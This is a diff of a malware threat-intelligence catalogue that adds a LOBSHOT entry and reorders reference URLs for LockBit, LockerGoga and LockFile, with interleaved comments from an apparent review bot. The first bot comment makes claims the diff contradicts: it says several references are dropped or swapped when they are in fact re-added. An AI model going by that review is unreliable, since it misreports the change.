"value": "LiteHTTP"
},
+ {
+ "description": "According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim's computer without being noticed. The hVNC component is effective in evading fraud detection systems. Also, LOBSHOT is being used to carry out financial crimes through the use of banking trojan and information-stealing functionalities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot",
+ "https://www.elastic.co/de/security-labs/elastic-security-labs-discovers-lobshot-malware"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c30db30e-e29a-4f62-bda0-c284fa7c6f6d",
+ "value": "LOBSHOT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit",
- "https://www.ic3.gov/Media/News/2022/220204.pdf",
- "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/",
- "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
- "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
- "https://id-ransomware.blogspot.com/search?q=lockbit",
- "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
- "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis",
- "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
+ "https://asec.ahnlab.com/en/35822/",
+ "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
+ "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://id-ransomware.blogspot.com/search?q=lockbit",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
+ "https://asec.ahnlab.com/en/41450/",
+ "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
+ "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware",
+ "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
+ "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor",
+ "https://twitter.com/MsftSecIntel/status/1522690116979855360",
+ "https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://cluster25.io/2022/07/06/lockbit-3-0-making-the-ransomware-great-again/",
+ "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/",
+ "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
+ "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
+ "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/",
+ "https://security.packt.com/understanding-lockbit/",
+ "https://analyst1.com/ransomware-diaries-volume-1/",
+ "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354",
- "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/",
- "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques",
- "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
"https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/",
- "https://www.connectwise.com/resources/lockbit-profile",
- "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
"https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
- "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.youtube.com/watch?v=C733AyPzkoc",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://blog.lexfo.fr/lockbit-malware.html",
- "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/",
+ "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/",
"https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
+ "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf",
+ "https://asec.ahnlab.com/ko/39682/",
+ "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
+ "https://www.ic3.gov/Media/News/2022/220204.pdf",
+ "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
+ "https://www.youtube.com/watch?v=C733AyPzkoc",
"https://ke-la.com/lockbit-2-0-interview-with-russian-osint/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
+ "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.connectwise.com/resources/lockbit-profile",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
+ "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/",
+ "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
+ "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign",
+ "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/",
+ "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/",
+ "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
+ "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/",
+ "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit",
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354",
+ "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/",
"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://www.glimps.fr/lockbit3-0/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware",
- "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/",
- "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
- "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
- "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
- "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
- "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
- "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
- "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
- "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
- "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
- "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/",
- "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/",
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
+ "https://blog.lexfo.fr/lockbit-malware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://asec.ahnlab.com/en/35822/",
- "https://intel471.com/blog/privateloader-malware",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf"
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion"
],
"synonyms": [
"ABCD Ransomware"
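Review bot: most of this LockBit hunk is churn rather than change. Dozens of URLs are removed at one position and re-added at another (the sentinelone `lockbit-3-0-update-...` article, the trendmicro ransomware-spotlight page and many more), which hides the few real additions and removals; emitting `refs` in a stable sorted order from the exporter would make the set change reviewable. Among the lines that do survive, several near-duplicates should be normalized rather than kept side by side: `https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/` and the same URL without its trailing slash, `https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511` and its `amgedwageh.medium.com` form, and the crowdstrike `double-trouble-ransomware-data-leak-extortion-part-1` URL with and without a trailing slash (the latter an unchanged context line). A few refs also leave with no replacement (the Lazio region bleepingcomputer article, the cybereason `rising-threat-from-lockbit-ransomware` post, the minerva-labs LockBit 3.0 post) and `asec.ahnlab.com/en/35822/` is swapped for a different `ko/39682/` page; if these mirror the upstream source that is fine, but the commit message should say so.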
@@ -29787,26 +31472,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
- "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
- "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.youtube.com/watch?v=o6eEN0mUakM",
- "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
"https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
- "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
+ "https://blog.talosintelligence.com/lockergoga/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
+ "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
"https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
"https://www.abuse.io/lockergoga.txt",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://www.youtube.com/watch?v=o6eEN0mUakM",
+ "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
+ "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
"https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes"
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/"
],
"synonyms": [],
"type": []
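Review bot: the only substantive change in this LockerGoga hunk is the new `https://blog.talosintelligence.com/lockergoga/` entry; all fourteen removed URLs reappear as `+` lines elsewhere in the same array, and the final `-`/`+` pair only moves the trailing comma. A deterministic ordering in the exporter would reduce this hunk to a one-line addition.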
@@ -29820,18 +31506,18 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile",
"https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/",
+ "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
+ "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
"https://twitter.com/VirITeXplorer/status/1428750497872232459",
"https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
- "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
- "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
- "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html",
"https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
